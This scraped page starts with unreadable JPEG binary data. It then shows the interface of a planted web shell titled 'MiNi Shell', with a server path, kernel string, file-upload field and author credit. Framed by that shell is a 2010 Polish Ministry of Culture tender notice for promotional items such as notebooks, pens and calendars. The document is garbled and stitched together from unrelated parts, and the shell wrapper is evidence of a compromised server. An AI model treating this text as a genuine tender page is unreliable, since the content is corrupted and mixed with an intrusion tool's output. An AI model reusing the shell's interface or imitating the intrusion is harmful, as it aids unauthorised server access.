JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100419/109588-N-2010.html

<p class="kh_header"><b>Warszawa: Artykułów informacyjnych i promocyjnych</b><br>
<b>Numer ogłoszenia: 109588 - 2010; data zamieszczenia: 19.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ministerstwo Kultury i Dzidzictwa Narodowego , ul. Krakowskie Przedmieście 15/17, 00-071 Warszawa, woj. mazowieckie, tel. 022 42 10 100, faks 022 82 88 773.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mkidn.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Artykułów informacyjnych i promocyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1 Przedmiotem zamówienia jest dostawa artykułów informacyjnych i promocyjnych 
2.2 Szczegółowy opis przedmiotu zamówienia: 

I część zamówienia
1.	Notesy formatu A5 ze spiralą,
Format A5  x 50 stron w bloczku, papier: offset 100g, spirala po dłuższym, lewym boku, 
z kolorową, twardą, tekturową okładką A4 (kolor 4+0), dodatkowa okładka: przeźroczysta, wg projektu Zamawiającego (4+0). Wykończenie: projekt graficzny stron w bloczku (4+0) przedstawiony przez Zamawiającego, ilość: 800 sztuk.
2.	Teczki z zapięciem na rzep na dokumenty, 
Format: A4, sztywny karton ok. 290 g/m2, laminowany folią błyszczącą, grzbiet ok. 5 mm, projekt graficzny (4+0 kolor) przedstawiony przez Zamawiającego, ilość: 600 sztuk.
3.	Długopis, materiał: metal, kolor: czarny, szary lub  jasnozielony, długopis automatyczny, wymiar: min 13 cm długości, wygrawerowane 3 logotypy przesłane przez Zamawiającego, ilość: 600 sztuk.                  
4.	Długopis z podstawką, magnes, 
Materiał: metal, magnes; kolor: srebrny, wymiary: O5,5x13 cm, okrągła podstawka 
z uchwytem (magnes) na długopis z wygrawerowanymi 3 logotypami zamawiającego, długopis w tym samym kolorze co podstawka, w tekturowym opakowaniu, ilość: 200 sztuk.
5.	Torba z drelichu z kieszenią zamykaną na suwak, 
Tkanina: denim bawełniany 285 g (ecru) długość ucha 65 cm, wymiar: 38 x 40 cm, wykończenie: wewnętrzne brzegi wykończone overlockiem, kolorystyka: ecru + wykończenia zamków, projekt graficzny (4+0 kolor) przedstawiony przez Zamawiającego, ilość: 600 sztuk.
6.	Wskaźnik laserowy z odbiornikiem USB, 
z funkcją przewijania, zasięg 15 metrów, materiał metal, kolor: czarny ze srebrnymi wstawkami, wskaźnik i odbiornik USB w metalowym pudełku z wygrawerowanymi 3 logotypami Zamawiającego, ilość: 100 sztuk.
7.	Apaszka, 
atłas (szaliczek wzorzysty), kolor pastelowy, wzorzysty, wzór oznakowania wg projektu Zamawiającego (4+0). Wymiary: 130 cm x 33 cm, ilość: 50 sztuk.
8.	Szalik,
Materiał: bawełna tkana, materiał gładki, kolor ciemny, wzór oznakowania wg projektu Zamawiającego (4+0). Wymiary: 140 cm x 18 cm, ilość: 50 sztuk.
9.	Kalendarz trójdzielny, 
Wymiar: 75 cm (wysokość) x 31 cm (szerokość) po złożeniu  18,5 cm (wysokość) x 31 cm (szerokość) 765 x 335 mm, pole nadruku - 335 x 35 mm x 3. Kalendarz drukowany na sztywnym kartonie ok 300 g/cm2, elementy reklamowe foliowane na błyszcząco, papier: offset biały 80 g/m2, druk: dwukolorowy (czarny/czerwony), kalendarium: 2 języki (polski, angielski), numeracja tygodni, 3 bloki, 12 kartek w bloku, łapki podtrzymujące kartki bloku, kartki z perforacją, główka: foliowana, podklejana, wypukła, okienka przesuwane na pasku folii. Wg projektu Zamawiającego (4+0 kolor), kalendarz ma być zapakowany w kopertę wg projektu Zamawiającego (4+0 kolor), ilość: 300 sztuk.
10.	Kalendarz biurkowy, 
Prostokątny kalendarz biurowy stojący. Oprawa grzbietu - spirala. Podstawka ze sztywnego kartonu. Wnętrze zadrukowane wg projektu Zamawiającego (4+4 kolor), wnętrze to 7 stron o gramaturze ok. 300 g/cm2. Wymiary podstawki ok: 230 x 100 mm, wymiary wnętrza stron: 230 x 140 mm, ilość: 300 sztuk.
11.	Kalendarz książkowy, 
Format: A5, oprawa twarda + pianka, papier: offset biały 100g, dzień na jednej stronie, druk dwukolorowy, m.in.: języki: polski, angielski, zaznaczone święta i imieniny, wkładka reklamowa na początku (kolor 4+0), notes teleadresowy z bloku, telefony alarmowe i informacyjne, ważne adresy internetowe, telefoniczne numery kierunkowe, międzynarodowe nr kierunkowe, odległości między miastami, wg projektu Zamawiającego (4+0) z trzema logotypami, ilość: 300 sztuk.
12.	Kalendarz książkowy, 
Format: B6, oprawa twarda + pianka , papier biały offset biały 100g, na każdej stronie 3 dni w roku, m.in. notes teleadresowy w bloku, telefony alarmowe i informacyjne, ważne adresy internetowe, telefoniczne nr kierunkowe, międzynarodowe nr kierunkowe, odległości między miastami, twarda okładka z 3 logotypami zamawiającego, ilość: 300 sztuk.
13.	HUB - rozgałęziacz USB z przyssawką gumową,
Liczba portów: 4, Wymiary: 52 x 28 x 37 mm, kolor: czarny bądź srebrny, 3 logotypy Zamawiającego, ilość 300 sztuk.
14.	Pudełko cukierków miętowych, 
Zawartość: 15 g miętowych pastylek bez cukru; Format: 64 x 50 x 18 mm, Kolor puszek: srebrny, 3 logotypy Zamawiającego wygrawerowane na pudełku, ilość: 800 sztuk.
15.	Magnez w kształcie kuli w opakowaniu, 
materiał stal nierdzewna, kolor srebrny, na magnesie wygrawerowane 3 logotypy zamawiającego, wymiary ok: O7,6x7,3 cm, ilość: 300 sztuk.
16.	Puzzle w pudełku,
Format A4 - 60 elementów (ok. 30 x 21 cm). Opakowanie: pudełko kartonowe dwuczęściowe (spód + wieczko) puzzle foliowane na tekturowej podkładce, trzy projekty dostarczone przez Zamawiającego (projekt puzzli oraz opakowania), ilość: 300 sztuk (po 100 egz. dla projektu).
17.	Identyfikatory, 
Identyfikator z twardego plastiku, wielorazowy, z klipsem i agrafką o wymiarach (58 mm wysokości x 90 mm szerokości), (3 logotypy Zamawiającego). ilość: 600 sztuk.
18.	Magnesy reklamowe,
Materiał: folia magnetyczna, karton, powierzchnia pokryta folią błysk, kształt prostokątny. Druk offsetowy - pełen kolor według projektu Zamawiającego (4+0). Wymiar 85x55 mm, ilość: 1000 sztuk.
19.	Zakreślacz fluorescencyjny z nadrukiem POIiŚ,
Materiał: obudowa plastikowa z wkładem, Wymiary: 100x25 mm, zakończony końcówką ściętą, grubość linii: 1-5 mm, różne kolory. 3 logotypy Zamawiającego Ilość: 1000 sztuk.
20.	Mapa Polski. 
Format ok. 23 długości x 40 cm szerokości, składane w harmonijkę, ilość elementów po złożeniu 24, do wielkości 5 x 7,5 cm, po złożeniu mapa przykliejona do dwóch tekturek z krańcowych stron o wymiarach ok.: 5,3x8,5 cm. Materiał: tekturki zewnętrzne, wewnątrz papier offset 170 g/cm2. Wg wzoru zamawiającego (4+4 kolor). Ilość: 1000 sztuk.

II część zamówienia

1.	Zakładki do książek
Prostokątne: 5,5 x 20 cm, papier 300 g/cm2, kolor 4+4, lakier, zgodnie z projektem przesłanym przez Zamawiającego, ilość: 1000 sztuk
2.	Zestaw w okładce (samoprzylepne kartki na biurko + samoprzylepne zaznaczniki)
- zestaw w zafoliowanej błyszczącej okładce
- skład zestawu: 1. notes z samoprzylepnymi karteczkami (70x75mm). Klej po krótszym boku. Notes ma 25 karteczek. 2. 5 foliowanych zestawów zaznaczników po 25 karteczek w każdym (17x50 mm). Projekt nadruku dostarcza Zamawiający, ilość: 550 sztuk
3.	Zakreślacz trójkolorowy
Wymiary: 8x8x1,2 cm; kolory: 3 kolory; materiał: plastik; nadruk: 4 loga (4 kolory), ilość: 1000 sztuk
4.	Pendrive
Pamięć 1 GB, materiał: plastik, kolor: czerwony, czarny  lub niebieski, wymiary: 60,3 x 23,8 x 12,2 mm, z zaokrągleniami na rogach, kartonowe opakowanie, nadruk przedstawia zamawiający, ilość: 300 sztuk
5.	Identyfikatory magnesowe  (z nadrukiem)
Materiał: aluminiowe, pokryte polimerem, zapinane na magnes, posiadają miejsce na umieszczenie kartki, prostokątne o wymiarze 73 x 44 mm, oznaczone 4 logo-typami w górnej części, nadruk termiczny, ilość: 250 sztuk
6.	Identyfikatory
Identyfikator z twardego plastiku, wielorazowy z klipsem i agrafką o wymiarach (58 mm wysokości x 90 mm szerokości). Nadruk 4 logo, ilość: 350 sztuk
7.	Notatnik A5
70 kartkowy notatnik (papier z recyklingu) o rozmiarze A5 z długopisem piszącym na niebiesko. Długopis jest przymocowany do notatnika gumką. Po dłuższym boku jest spirala. Nadruk na długopisie, projekt wnętrza notatnika dostarcza zamawiający, ilość: 600 sztuk
8.	Długopis
Długopis aluminiowy z metalową skuwką i błyszczącym korpusem. Gumka w dolnej części ułatwiająca trzymanie. Wyposażony we wkład o kolorze niebieskim. Pakowany pojedynczo w woreczek foliowy. Kolor czerwony, niebieski bądź czarny. Wymiary: 135 mm*12*12 mm, ilość: 900 sztuk
9.	Pióro w etui
Wykonane z metalu bordowe błyszczące pióro wieczne ze srebrnymi wykończeniami. Pakowane w metalowe etui. Logo naniesione na skuwkę i etui. Wymiary: 135*10*10 mm, ilość: 300 sztuk
10.	Torby papierowe
Materiał: papier kreda 200g/m2, uchwyt: sznurek 5 mm (kolorowy); wzmocnienia: dno + ranty górne; lakier; nadruk 4+0; na materiały o wielkości A4; projekt graficzny Zamawiającego, ilość: 600 sztuk
11.	Teczka papierowa
Format A4, biała od spodu, papier stomkard 265 g/m2, kolorystyka 4+0+lakier UV (skrzydełka też), teczka do składania, projekt graficzny Zamawiającego, ilość: 600 sztuk
12.	Stojak na materiały promocyjne
Hold1 z topperem. Składana konstrukcja aluminiowa szerok. 25 cm. Wysokość po rozłożeniu 1470 mm. 6 półek przezroczystych do formatu A4. Walizka transportowa. Oznaczenie zgodnie z projektem zamawiającego (4+0), ilość: 1 sztuka.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie ma</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Jakość artykułów - 50</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki zmiany terminu wykonania przedmiotu zamówienia może nastąpić
z powodu uzasadnionych zmian w zakresie sposobu lub terminu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli zmiany te są korzystne dla Zamawiającego;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mkidn.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ministerstwo Kultury i Dziedzictwa Narodowego 
Biuro Administracyjno-Budżetowe 
ul. Krakowskie Przedmieście 15/17 
00-071Warszawa , pokój nr 127.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2010 godzina 11:00, miejsce: Ministerstwo Kultury i Dziedzictwa Narodowego 
Biuro Administracyjno-Budżetowe 
ul. Krakowskie Przedmieście 15/17 
00-071Warszawa pokój 127.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com